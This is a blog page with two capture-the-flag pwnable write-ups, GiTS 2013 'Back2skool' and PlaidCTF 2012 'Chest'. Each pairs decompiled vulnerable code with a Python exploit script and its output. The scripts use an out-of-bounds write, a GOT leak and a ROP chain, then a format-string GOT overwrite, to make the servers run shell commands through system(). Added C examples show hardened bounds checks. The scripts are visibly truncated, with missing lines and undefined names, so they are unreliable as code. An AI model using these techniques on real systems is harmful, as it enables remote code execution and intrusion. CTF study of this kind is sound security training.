# codezen.fr: code hacking, zen coding

19 Feb 2013

## GiTS 2013 CTF – Pwnables 250 Question 10 – Back2skool Write-up

#### Posted by aXs

back2skool-3fbcd46db37c50ad52675294f566790c777b9d1f: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, stripped

This is the binary for MathServ, "The one-stop shop for all your arithmetic needs".

```
$ nc localhost 31337
 __  ___      __  __   _____
/  |/  /___ _/ /_/ /_ / ___/___  ______   __ v0.01
/ /|_/ / __ `/ __/ __ \__ \/ _ \/ ___/ | / /
/ /  / / /_/ / /_/ / / /__/ /  __/ /   | |/ /
/_/  /_/\__,_/\__/_/ /_/____/\___/_/    |___/
===============================================
Welcome to MathServ! The one-stop shop for all your arithmetic needs.
This program was written by a team of fresh CS graduates using only the most
agile of spiraling waterfall development methods, so rest assured there are
no bugs here!

Your current workspace is comprised of a 10-element table initialized as:
{ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9 }

Commands:
write Write value to given index in table
func2 Change operation to multiplication
math  Perform math operation on table
exit  Quit and disconnect
1
Value at position 1: 1
write
Input position to write to:
1
Input numeric value to write:
10
Value at position 1: 10
func1
math
Result of math: 54
exit
Exiting program!
```

You can read and write numbers to an array and perform addition or multiplication of all the entries of the array.

Let's check how the "read" function works:

```c
sendString(sockfd, (int)"Input position to read from:\n");
position = atoi(&nptr);
value = *(_DWORD *)&values[4 * position];
sock_printf(sockfd, "Value at position %d: %d\n", value);
```

There are two vulnerabilities here:
- There is no bounds checking on the position value
- position is signed, so a negative offset can be used

Basically, you can read and write arbitrary memory, which will prove useful for the information leak.

Let's move to the "write" function:

```c
position = atoi(&nptr);
if ( position <= 9 )
{
    sendString(sockfd, (int)"Input numeric value to write:\n");
    *(_DWORD *)&values[4 * position] = atoi(&nptr);
    sock_printf(sockfd, "Value at position %d: %d\n", position);
}
else
{
    sendString(sockfd, (int)"Table index too large!\n");
}
```

Almost the same story here, except this time there is an insufficient bounds check:
- You can still enter a negative number and the if() check will pass
- As position is signed and later multiplied by 4 (shifted left by 2 bits), the sign bit can be made to disappear:

```
10000000000000000000000000000011 = -2147483645 = 0x80000003
<< 2
00000000000000000000000000001100 = 12 = 0xC
```

Now let's focus on the "math" command:
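The two checks side by side, as an added example that is not code from the original post or the MathServ binary: the write handler's check as decompiled, the 32-bit byte offset it really computes, and a hardened bounds check. The table and the function names are constructed for illustration.

```c
#include <stdint.h>

#define TABLE_LEN 10

/* Constructed stand-in for MathServ's 10-element workspace. */
static int32_t values[TABLE_LEN] = { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9 };

/* The write handler's check as decompiled: an upper bound only, applied to a
 * signed value, so every negative position is accepted. */
int write_check_as_shipped(int32_t position)
{
    return position <= 9;
}

/* Byte offset the handler really uses: &values[4 * position] in a 32-bit
 * binary. Computed in uint32_t, which is the wrap-around the CPU performs;
 * 0x80000003 * 4 drops the sign bit and lands on values[3] (offset 12). */
uint32_t byte_offset_32(int32_t position)
{
    return (uint32_t)position * 4u;
}

/* Hardened check: one unsigned comparison rejects both negative positions
 * (they become huge) and positions past the end of the table. */
int write_check_hardened(int32_t position)
{
    return (uint32_t)position < TABLE_LEN;
}

/* Accessors that fixed read/write handlers would call. */
int table_write(int32_t position, int32_t value)
{
    if (!write_check_hardened(position))
        return -1;
    values[position] = value;
    return 0;
}

int table_read(int32_t position, int32_t *out)
{
    if (!write_check_hardened(position))
        return -1;
    *out = values[position];
    return 0;
}
```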

```
.text:080493A5                 mov     eax, ds:(math_ptr - 804BF54h)[ebx]
.text:080493AB                 mov     edx, [eax]
.text:080493AD                 mov     dword ptr [esp+4], 0Ah
.text:080493B5                 mov     eax, ds:(values_ptr - 804BF54h)[ebx]
.text:080493BB                 mov     [esp], eax
.text:080493BE                 call    edx
```

The function pointer stored in math_ptr is called directly. If we can overwrite the content of this math_ptr and replace it with an EIP we control, we will get remote code execution.

Some complications:
- The stack is NX
- The binary has been compiled with RELRO: read-only sections: .got, .dtors, etc.
- There are no interesting functions in the GOT for exploitation: no system, mmap, mprotect or execve

So our exploit workflow will be:
- Leak information: get the address of libc's __libc_start_main from the GOT
- Overwrite math_ptr with a stack pivot
- Fill the values array with a shell command line: cat key>&4
- Fill a user-controlled buffer with a small ROP chain that calls system() with the values array as its parameter

Our stack pivot:

```
.text:08049550                 pop     ebx
.text:08049551                 pop     esi
.text:08049552                 pop     edi
.text:08049553                 pop     ebp
.text:08049554                 retn
```

A last important piece of the puzzle is the exact offset of the system() function in memory. Using a shell from a previous challenge, we found out that the challenge box runs Ubuntu Precise i386 with libc 2.15. We need this to get the offset of system() inside libc.so.6. You can download this specific version from here, for example: http://109.203.104.18/automate/instances/linuxmint/pbuilder/precise-i386/base.cow/lib/i386-linux-gnu/libc-2.15.so

Using the information leak, we got the address of __libc_start_main() in memory. If we have the distance (offset) between __libc_start_main() and system(), we can calculate the system() function's address in memory.

```
$ gdb libc.so.6
Reading symbols from libc.so.6...(no debugging symbols found)...done.
gdb$ p system
$1 = {<text variable, no debug info>} 0x3d170 <system>
gdb$ p __libc_start_main
$2 = {<text variable, no debug info>} 0x193e0 <__libc_start_main>
```

The offset between __libc_start_main() and system() is 0x3d170 - 0x193e0 = 0x23D90.

So in memory, the address of system() will be the address of __libc_start_main() + 0x23D90.

And we know the __libc_start_main() address from the GOT table.

We got everything, so here is the exploit:

```python
# Python 2 script as posted; some lines of the listing are missing.
import ctypes
import telnetlib
from struct import pack, unpack

math_ptr = 0x0804BFEC
user_ptr = 0x080499B8
got_table_start = 0x0804BF54
got_table_end = 0x0804BFFC

    position = offset_to_position(offset)
    tn.write(str(position) + "\n")
    return ctypes.c_ulong(value).value

def write_memory(offset, value):
    position = offset_to_position(offset)
    tn.write("write\n")
    tn.write(str(position) + "\n")
    tn.write(str(ctypes.c_long(value).value) + "\n")
    return ctypes.c_ulong(value).value

def overwrite_got_pointer(got, offset, value):
    return write_memory(got[int(offset, 16)], value)

        position = -((addr_values - offset) >> 2)
    else:
        position = 0x80000000 + ((offset - addr_values) >> 2)
    return ctypes.c_long(position).value

HOST = 'back2skool.2013.ghostintheshellcode.com'
PORT = 31337

tn = telnetlib.Telnet(HOST, PORT)

print "Dumping GOT..."

got = {}
ptr = {}

for offset in range(got_table_start, got_table_end+4, 4):
    hex_value = hex(value)
    #print hex(offset),":", hex_value
    got[offset] = value

print "Getting fd and __libc_start_main offset from GOT"

ptr['__libc_start_main'] = got[0x0804BF9C]

for value in ptr:
    print value, '=', hex(ptr[value])

# Challenge box was Ubuntu Precise i386 with libc 2.15
system_ptr = ptr['__libc_start_main'] + (0x3d170 - 0x193e0) # system - __libc_start_main

print "system() is at", hex(system_ptr)

print "Math vfptr at " + hex(math)
print "Current math vfptr is", hex(read_memory(math))

print "Overwriting math vfptr with stack pivot"
write_memory(math, 0x08049550)

print "Current math vfptr is", hex(read_memory(math))

print "Filling values array with shell command"
# cat key>&4\n

print "Putting ROP chain on the stack"
tn.write('ABCD' + pack('<I', system_ptr) + 'ABCD' + pack('<I', addr_values)  + "\n")

print "Pwning!"
tn.write("math\n")

tn.write("exit\n")
```

Results:

```
$ python pwn250.py
Dumping GOT...
Getting fd and __libc_start_main offset from GOT
sockfd = 0x4L
__libc_start_main = 0xf76133e0L
system() is at 0xf7637170L
Math vfptr at 0x804c078L
Current math vfptr is 0x0L
Overwriting math vfptr with stack pivot
Current math vfptr is 0x8049550L
Filling values array with shell command
Putting ROP chain on the stack
Pwning!
You couldn't own a box if you purchased it
```

Key is "You couldn't own a box if you purchased it"

2 May 2012

## PlaidCTF 2012 – Pwnables 300 – Chest Writeup

#### Posted by aXs

Robots are running secret service that aims to mill down diamonds into fairy dust, and use it to take over our world! Help us please!
23.22.1.14:1282

In this challenge we have a telnet interface to a nice chest that can store an item, remove an item or view the list of stored items.

```
Welcome to the Adventurers' storage room!
If you don't yet have a personal chest, you can use this one: XXXXFJ4bO1
Which chest to you wish to access? [XXXXFJ4bO1]:
Using chest XXXXFJ4bO1

What do you want to do?

[1] View items
[2] Store an item
[3] Take an item
[4] Leave
[5] Destroy the chest
> Choose an option:
```

After disassembling the binary, we see that there is a format string vulnerability in the "View items" function.

```c
do
{
    v0 = sub_8048C7B(dword_804AC90, &v2, 499, 0);
    dprintf(fd, (const char *)&v2);
}
```

The name of the item is used as the format string for dprintf. Easy, right? Not so fast...

There is a function that heavily filters user input against a whitelist:

```c
n = strspn(src, "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789&-+ ");
```

The percent character is of course not whitelisted, so we cannot send a format string directly.

To exploit this vulnerability, we need to combine it with another design error: when you connect to the service, you can input the name of the chest you want to open.

The error is that if you connect two clients simultaneously, have both open the same chest and use the destroy chest function in one client, the other client will malfunction in a very interesting way.

Remember this read loop for viewing the items?

```c
do
{
    v0 = sub_8048C7B(dword_804AC90, &v2, 499, 0);
    dprintf(fd, (const char *)&v2);
}
...
int __cdecl sub_8048C7B(int fd, void *a2, int a3, char a4)
{
    char v4; // al@3
    char v5; // al@7
    void *buf; // [sp+28h] [bp-10h]@1
    ssize_t v8; // [sp+2Ch] [bp-Ch]@2

    buf = a2;
    do
    {
        v5 = a3-- != 0;
        if ( !v5 )
            break;
        v8 = read(fd, buf, 1u); // will return 0
        if ( v8 != 1 ) // will pass
        {
            if ( v8 ) // will not pass
                exit(1320024593);
            return buf - a2; // will return, buf left untouched!
        }
        v4 = *(_BYTE *)buf == a4;
        buf = (char *)buf + 1;
    }
    while ( !v4 );
    return buf - a2;
}
```

As you can see, once the chest has been destroyed, read() fails to read anything and the function returns, leaving the buffer untouched... untouched means with its previous content... and this same function is also used to read the name of the item:

```c
dprintf(fd, "> Store what item? ");
src[sub_8048C7B(fd, (void *)src, 499, 10)] = 0;
```
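To show why a drained descriptor leaves stale content behind, here is an added example (not code from the challenge binary or the original post) that mirrors the loop of sub_8048C7B beside a hardened version, then runs both against an already-drained descriptor, with /dev/null standing in for the destroyed chest. The function names are constructed.

```c
#include <fcntl.h>
#include <string.h>
#include <unistd.h>

/* As decompiled in sub_8048C7B: byte-at-a-time read until `delim` or `len`.
 * When read() returns 0 (EOF) the count so far is returned, 0 if the
 * descriptor was already drained, and the buffer keeps its old contents. */
ssize_t read_until_as_shipped(int fd, char *buf, size_t len, char delim)
{
    size_t i = 0;
    while (i < len) {
        ssize_t n = read(fd, buf + i, 1);
        if (n != 1)
            return n < 0 ? -1 : (ssize_t)i;   /* EOF: stale bytes stay */
        if (buf[i++] == delim)
            break;
    }
    return (ssize_t)i;
}

/* Hardened: EOF before any byte is reported as -1 and the result is always
 * NUL-terminated, so a caller can never mistake old contents for input. */
ssize_t read_until_hardened(int fd, char *buf, size_t len, char delim)
{
    size_t i = 0;
    ssize_t n = 1;
    if (len == 0)
        return -1;
    while (i + 1 < len && (n = read(fd, buf + i, 1)) == 1)
        if (buf[i++] == delim)
            break;
    buf[i] = '\0';                              /* always terminated */
    return (n < 0 || i == 0) ? -1 : (ssize_t)i;
}

/* Constructed scenario: the buffer still holds an earlier item name and the
 * descriptor is already drained (/dev/null returns EOF at once). Copies the
 * buffer as the chosen reader left it into `leftover`, returns its result. */
ssize_t drained_descriptor(int hardened, char leftover[32])
{
    char buf[32] = "sword";                     /* stale contents */
    int fd = open("/dev/null", O_RDONLY);
    if (fd < 0)
        return -2;
    ssize_t r = hardened ? read_until_hardened(fd, buf, sizeof buf, '\n')
                         : read_until_as_shipped(fd, buf, sizeof buf, '\n');
    close(fd);
    memcpy(leftover, buf, sizeof buf);
    return r;
}
```

With the shipped loop the caller gets 0 back and the old name is still in the buffer; the hardened loop reports -1 and hands back an empty string.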

So to exploit this we need to:
- Connect two clients
- Choose the same chest in both clients
- Destroy the chest using one client
- With the remaining client, store an item carrying our format string
- List the chest content, which triggers the format string
- Perform an additional action to get the flag (see below)

After reviewing my options, I noticed system() is already part of the GOT table, so I will try to overwrite strspn's GOT entry so that an unfiltered string can be used as the system() parameter.

For this, I used hellman's highly recommended libformatstr library, which makes format string building very easy.

```python
#!/usr/bin/env python
# -*- coding: latin-1 -*-
# Python 2 script as posted; some lines of the listing are missing.

import socket
import sys
import re
from libformatstr import FormatStr

if len(sys.argv) != 3:
    print '\nUsage:\t./chest.py [host] [port]'
    sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

fs = s.makefile()

s.send('\n');

regex = re.compile("Using chest (.*)")
r = regex.search(chest)
chest = r.groups()[0]

print 'Chest', chest

s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((host, port))

fs2 = s2.makefile()

s2.send('%s\n' %chest);

# destroy chest
for i in range(1,9):
    s.send('5\n');
s.close()

for i in range(1,10):
    s2.send('2\n')

got = [0x08048796] # system()
p = FormatStr()

# we start the payload with a non-whitelisted char so that the NUL byte
# is put at the beginning of the string

# view chest content
for i in range(1,9):
    s2.send('1\n')

# strspn() is now system()
# fd 4 is our socket
s2.send('ls -la>&4 ; cat key>&4\n')

while 1:
    line = s2.recv(4096)
    if not line:
        break

sys.stdout.flush()

s2.close()
```

Running our exploit we get (some garbage removed from the beginning):

```
total 28
drwxr-xr-x 2 root root 4096 Apr 28 04:36 .
drwxr-xr-x 3 root root 4096 Apr 27 19:27 ..
-rwxr-xr-x 1 root root 8564 Apr 27 19:27 chest
lrwxrwxrwx 1 root root    3 Apr 28 04:36 flag -> key
-rw-r--r-- 1 root root   24 Apr 27 03:48 key
-rwxr-xr-x 1 root root   41 Apr 27 19:27 start.sh
lemons_are_in_the_chest
```

The key is: lemons_are_in_the_chest